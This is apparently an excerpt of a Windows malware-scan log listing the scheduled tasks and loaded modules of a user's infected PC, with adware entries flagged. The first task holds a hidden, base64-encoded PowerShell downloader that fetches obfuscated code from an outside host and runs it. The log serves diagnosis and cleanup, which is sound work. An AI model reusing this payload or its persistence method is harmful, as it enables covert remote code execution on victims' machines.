Task: {4F27F764-3DF6-41E2-B13E-C181E52BD9FE} - System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGMAbwBuAHQAZQB4AGYAaQB4AC4AaQBuAGYAbwAvAHUALwA/AGEAPQA2AEUARQB4AFkAdgAtADkAMQBfAHAANQBvAHUAZwB6AEIAbwAyAGsAbwBlADIAQwBhAGoARQBmAHEAVwBQAHEAUwBFADUASQBXAHEAMQBtAE8AWQBVAFEATABRAEIAdQBhAEMANQBDAGYAMAB5AFcAZwAwAFUASABfAE8AcgAwADQAbQBMAGwAVAAxAGwAaABqAFQATQBtAGEAUQBHAGUARgBaAHMAZQBXAGYARQB5AGgAVQBnAEkANABoAFgAcgA1AHgAagBCAHcATAB1AGUAcABWAGsAeQBZAHoAUwBnAHYASQBTAEcARgBFAFoASQBTAFgAZwBNAEEAcgB3AFMAQQBYAGQAbQBIAGgAcwBiAGYATQBRAFEAVgBDAFYAVgBiAF8AVQBNAEIANgB1AE4AdABZADcAcwBLAHkAMQA3AF8AVQA3AEwAbwB4AFEAegBrAEsAeABJAGYAMwBQAFMAcAA4ADMANwAwAHYAUgBVAGIAbgBBAHQAQQBVAEIATABWAGUAbQBVAHMAZQBxAEkAdwB5AHIATwBLAGQAYgBaAG8AOABaAHgAMgBfAGwAWgAzAGwAMQBVAE0ATQBUAG4AWQBpAHUAdgBKAC0ANgA1AEUALQBsAFcAeAAzAEgAMAB4AE4ARQAzAHoAMAAyAEMAQQBiAEkAUgBnAHUAZgAyAFcAMQBGAEwAbABDAGsAQwAtADYATgBmAE0ALQBkADMAcwBkAHgAaABjAFAAdABqAGEAUABPAEYAdABCAHAAdgBCAC0ALQBIAGIARwB4AG0ATQBTAEgAagAxAGEAOQByAGgAYgBNAGcAbwBUAEYAbgBVAGUAXwA5AFAAeABqAC0AaABlAFUAYgB3ADUAWQBrAHQAQQAyAHkATQBtAEkAdABDAEIAawBIAHgAUABZADkASgBXAFgASwBJAC0AVgBfAEMASQBpAHMAQQB0AE4AcgBLAGgAWAA2AGoASgB5AFgAZQBKAHQAUABkAEsAUABOAGkAegA1AG4AMQBCAEgAbgB1AHYAVABrAHgAdgB6AFcAWQBuAFEANwBZAFcAdQBrADQAQwBtAEUAMQBvAGwAeABGADEAcgBJAEQAbgA5AFUARABTAFgAYgBxAGcAYQBsAGUASQBNAGYAZwBlAEYAbgBNAGwAVwBSAEgAaABJAFkAXwBPAHUAbQA2AG0AQQAxAHcAQQBKAFcAVgA2AHMASQBHAFQAMwBYAGUASgBWAFQAawBkADUAUQBWAFkAcgBlADYAcQByAHcASQBNAHIAbAB1AFQANAAtAF8AMAA5ADMANgBMAEwAaQBxAEgAdQBjAG4AUwBWAF8AZQBtAE8AYwBEAHQAYwBLAEEAbQBTAEoAWgBNADQAZgBLADMAMABoAGsARQBtAG4ANwA3AHAAYQB6AHYAWgBBADYASwAtAFEAZwBCAG8AYgBkAHoATABzAGYAdQBmAE0ANgBQAEUAMwBhADIATABIAE4AWQBxAGsAQwA0ADAAdwBSADUAZgA0ADUAMwBNAG8AUABnAC0AZwAxAGIAVwBVAGQANgBXAFoAaAAzAHkAcABxAC0AZgBVAGsARQA5AHYASQBkAHoAYQBlAHYATwBaAFMAMgBSAE0AdgB3AHMAdQBjADEAeABOAGgAZABDAEkAQgA5AGQARQBDAEEAUAA5ADgAegBYAHoAVgBUAG8AaABMAEwAOAB1AG8ALQBuAG8AMABHAGYARwBkAFQATgBaAHoAQQBZAE4ARABDAFoAcQBnAFgAUwBJAHUAVQA0ADcAVABWAE4AawAxAFAAegBKAHUAaQBhADMAVABsAFUATgB0AG0AQQAtAFMAMwBQAE8AVwBmAEsAUgBVAFUATQA1AGYAcwA4AEcAVgBkAGIAUwBIAG4AZQB1AFEARwBTADYAUQB3AGsAUQB1AFcAaABnADEAcwB6AGUAcgBXAHgAdAB3AHoATQBRAEkASgA4AG0ALQAtAHYASQBRAEIAQgBJAGgAUgBDAGsARQBpAEYASwBzAE0AaAA2AGYAVwBlAGMANQBFAFcAYQBnAG0AcwBCADgATwBMAGgAcAB2ADYAawAxAEoAQwBaAEUAQwA0ADMARgAtAFAAZwBQAHcAdQB1AGYAbwBiAEwANABaAEgANwBJAHoAcQBIAE4ATQB4AGYAeQBSADYAbABhAFgAUABWAHAAZwBrAGoAegBjAEMAOABNAFcAWQBjADAANgBVAHMAbQBvAHgARgA0AHgAcQBLAEkAbQBGADgAUQBvAHUATABNAHMAQwBRAGYAZgB3AGkASABZAEcAeABfAEUAWQB5AEYAYgBhAE4AcQBfAHYAWQAxAGoAOABuAFQAbABhAGUAawA1AG8AcwBuAE8ATwBCAGEAcgBEAEMAJgBjAD0AcAA5AHoAbwByAHQARgBvADUAVQA2AFYASwB5AGwAbAA2AFYAZAAwADcARgAtADkAQQBiADYARwBoAGIAawBHAFoAcABwAGoAZwBJAFMAaQBoAGEAQgBNAHEAbAA2AHUAeABVAGgAQwBTAFgAZwBZADAAaQBLAHAAYgB4AG8ASgB4AGoAegBoAHEAcwBMAFQAdwB6AGUAQgBKAGgAegBUADQANQBPAGoAVABSAG8ASgA5AF8AUwBkAHIAUwBLAHoAOQA5AFgAQQB0AGkALQB2ADMAQQBIAHAATAAxAFkAWABfAC0AXwA0AFcASQBlAHoATABhAGQAaABDAFkAOQBJAGwAUwB4AG8AQgA1ADQASABiAEcAZgBBAGYATABIAGMAZgBDAE4AdgBuAGwAbgBzAEIAVAB3AGIARQB6AGwATQBnAFIAUwBpADAAbgBQAGgAMABkAEUAawBCAG8AZwBvADIAOQBrAGoAZgBtADQAeAAzAEMAQgAxAE4ARgBqAGwAdABwAE0AVQBoADUAWQBlAG4AVwA0AHoANAA1AHEALQB0AFoARwAxAHYAQwAxADAAVwBwAHcAYQBiAHgAOQBRAHUAUwBmAHUAeABWAEwARQBSAE8AMQA3AC0AMABEAFYAZQBHAE4ANABmAHYAMwBmAGcAVgBfAEYAZgBQADgAZQAxAE0AYgBDAHoAUgBnAHgAaQBRAFAALQBiAEwAYgB1AHcAcgBtAE4ASAAxADkAQgB0AGgATQByAEUATQBwAEUASQBvADQAMABSAFoAQwBWADYAWQBHADYAMQBTAGwAOABhADMAOQBzAGEAdgBtAHIAXwBfAFoAaQB5ADkARwBwAGIATgBrAHkAWgBCAEIAdgBvAHgAegB6AEEAdwBrAFIAZQBxAFIAOABiAFcAdgB1AEgAUgBEAHYAZwA4AC0AYQBOAHIAaQA0AFgAMABMADUARwBqAFUAdABzAFMAWQA2AHQAOQBRAHUATwBUAHEATQBOAEEAWAAxAGUAdwByAE0AawBfAGEARwBiAHYATQA4AHoAXwB1AGoAcQBoAHQATAA4AGQAeQBSAEIANgAwAFMAZABYAEwAUgA4AHAAcgBkAGoAWQBDAHQAMwB6AEUAZABUAHIARAA0AGoAUwBsAEQAVwBWADQAWQAtAEQAbABwAGMANwBZAEgAawBtAGUATABxAHcAWABJAGkAbQB2ADcARQBWAFEAWQByAHUAegAyAFkAVwBnADgAbwB1AGsAQQA3AHkANQBoAHEAWgB5AGQAcQBZAEsAQwAwAFcAZwBjAHUATABGAFIAawA2AGQARABfAC0AYwB3AG8ANABIAHMAMQBmAHIAWABlAFQAUABxAFkAcwBJAFgATgBQAG0AMQBNAEEAegAzAHgAUgBnADMAVQA4ADQAdQBnAGMAbABPAEMAOAByAG8ATQA1AFYAVwBfAEsAVgByAEoAYQBsADMAWQBuAHcAbgBGADgALQAyAFkAZwBoAHkAMABKAEgANwBHAHYAYQBrAEwAaQBTAHAAVwBQADIAXwAtAFcATABPAHkAZQBfADUAWgA5AGkAcQBhAEQAWQBBAHoAdwBkAG4AUAB6ADMAagBZAE8ATABQAHYAQgB3AEcAbQBtAEMAMgBHAG4ATABCAGgAbAB3AGMAVwBFAGkAMwA4AGQATABtAEQAZgBWAE8AUABLADkAUABEAEgAWgBOAGQAawBvAHoAYQBTAGQAYQB4AHAAMQBZAFUAaAAzADEAZQBjAFIAYwB6AFIASwBqAG4AXwBlADgAVABhAHgAbgBMADgAVQBiADcAWAA2AHQARgBHAC0AUQBSAEsAXwBwADEASgA0AGwAUQB2ADkAYQBVAE4AMwBRAEMANwBjAHIAVwBxAHIAUwBrAEwAZwBoAHAAOQBSAEEANABUAFUALQBJAHgAZABwADEAWABwAGQAYgBKADgAMwB5AHAAaABfAEQAdABTADEARQBjAGMAUQBxAHYAZABGAFAAVQBRAFAAYgB2AHgAUQA0AHkAUAB2AE0AVABhAEIASgBEAEwAUgB1ADQAawAtAE0AdQAyAC0AUgBvAEwAeQBJAEgANQB3ADIAZABiAGgAUAA0AGsAaABiAEkAbgBvAFQAeABSAE4ARQBVAFgANgA1ADEAOABlAHIARABCAEQAQgBNAFIAUgBRAEgAcQBBAEIATQBUAFEAMwB1AFoASQA5AGcANQBlAHEATABmAC0ALQBfAEEASQBuAEQAcwBzAEYAVQBBAFYAcQBQAEcAOAB4AEUAVwBPAEQAeQBrAGwAcQB0AC0AVgB6ADcATQBrAHEANABOAFYAMwBqADYAMQAtAEMAOQBwAHEAVABiADYAYgAzAFoAdwBaAEgARQBwAHUAWAAwAEUATgBDAGYAXwBpAHMATgBMAGIAdABpAG8ASAByADkAUAB0ADkAWABjAEoAOABXADQATABfAHIAUwBQAE8AVgA3AGcAeAB2AFgARgBZAFMAbABHAGcARwBpADEAZABYAHcAeQBKACYAcgA9ADQAMAA5ADQAMQA5ADMAOAA4ADMAMwA3ADAAOAA4ADYANwAzADUAIgA7ACQAcwB0AHMAawA9ACIAewA3ADgAMABFADAAQgA0ADcALQA3AEEANwA4AC0AMABBADAARQAtADAAOQAxADEALQAwAEIANwA5ADAANQAwAEYAMQAxADAAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIATABVAFIATgBVAEoAVABHACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA

Task: {50E6F317-59DB-422A-9B35-05CEE2D58C6D} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2015-01-28] ()

Task: {51C95B35-225E-452C-9301-234846811C7B} - System32\Tasks\Fusion Browser Launch Task => Chrome.exe --sch-launch --docked

Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto

Task: {5AEE6A25-B4D6-49E7-B18D-ABD907487893} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)

Task: {64926D10-C113-4849-8364-4A23DB2C3DAF} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-08-04] (McAfee, Inc.)

Task: {66CF5B26-85E0-4095-BBD6-31F18B44D146} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-30] (Dropbox, Inc.)

Task: {68515BA3-AB7D-4C48-81CD-C3A65A8AC7C1} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)

Task: {6B93D5BA-BB45-4347-81DF-75BA6966225D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-03] (Adobe Systems Incorporated)

Task: {89ADF2EF-5764-435C-94D1-418A19E06A10} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {8DBAF71D-D981-4D7F-8D96-90E4F3566220} - System32\Tasks\WebUpdater Task => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)

Task: {8F71346F-9754-43AE-A404-6A5F027FC396} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2015-12-29] () <==== ATTENTION

Task: {8FF9009A-01AA-4BD7-ADF3-B9B364D804B1} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)

Task: {B09ED9A5-FF07-413E-8837-759CE1FA36FD} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)

Task: {B68388AB-C415-428A-B356-E4BFC84963A3} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2015-12-29] () <==== ATTENTION

Task: {B77A26F5-7E7E-4C11-BE1E-955A618C1998} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)

Task: {C25A0339-CBFA-43B6-A68B-F52402B01256} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)

Task: {C2DB69D1-5A12-447D-9C4A-D26C1277F20F} - System32\Tasks\HPCeeScheduleForCharlie => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)

Task: {C85EF2F7-128A-4947-B39D-03AEE0EF3196} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2015-12-29] () <==== ATTENTION

Task: {CE9E7981-1275-407B-BBB4-40497F96FB2C} - System32\Tasks\WebUpdater LaunchTask => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)

Task: {D173A88A-027B-4BB6-88B4-6D29241A2D6C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)

Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core.job => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe

Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA.job => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\HPCeeScheduleForCharlie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-03-28 15:31 - 2014-03-28 15:31 - 02110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll

2014-03-28 15:27 - 2014-03-28 15:27 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll

2014-03-28 15:27 - 2014-03-28 15:27 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll

2014-03-28 15:27 - 2014-03-28 15:27 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll

2014-03-28 15:48 - 2014-03-28 15:48 - 00367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll

2014-03-28 15:48 - 2014-03-28 15:48 - 00712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll

2014-10-29 11:03 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll

2015-10-30 15:03 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2013-11-29 00:32 - 2013-11-29 00:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll

2013-11-29 00:38 - 2013-11-29 00:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00017168 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe

2016-01-10 11:54 - 2016-01-10 11:54 - 00008976 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Service.Logger.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00028432 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WcfService.dll

2016-01-10 11:55 - 2016-01-10 11:55 - 01983640 _____ () C:\Program Files (x86)\Get-a-Clip\MFLService2.exe

2016-01-10 11:55 - 2016-01-10 11:55 - 00116208 _____ () C:\Program Files (x86)\Get-a-Clip\mflstart.exe

2016-01-10 11:56 - 2015-12-30 09:15 - 21754368 _____ () C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe

2016-01-10 11:56 - 2015-12-30 09:15 - 00255488 _____ () C:\Program Files\WebUpdater\1.0.24.0\isa_x64.dll

2016-01-10 11:56 - 2015-07-31 12:37 - 00584704 _____ () C:\Program Files\WebUpdater\1.0.24.0\detection_rules_x64.dll

2015-12-11 12:38 - 2015-10-30 19:59 - 00034768 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00019408 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\faulthandler.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00022848 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Random.OSRNG.winrandom.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00023352 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Util._counter.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00042296 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Cipher._AES.pyd

2015-12-11 12:38 - 2015-10-30 19:59 - 00116688 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pywintypes27.dll

2015-12-11 12:38 - 2015-10-30 19:59 - 00093640 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_ctypes.pyd

2015-12-11 12:38 - 2015-10-30 19:59 - 00018376 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\select.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00019760 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00105928 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32api.pyd

2015-12-11 12:38 - 2015-10-30 19:59 - 00392144 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pythoncom27.dll

2015-12-11 12:38 - 2015-12-08 16:36 - 00381752 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd

2015-12-11 12:38 - 2015-10-30 19:59 - 00692688 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\unicodedata.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00020816 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00109520 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 01737032 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00020808 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00020800 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_python_x66cf7a7cx17a72769.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00021840 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd

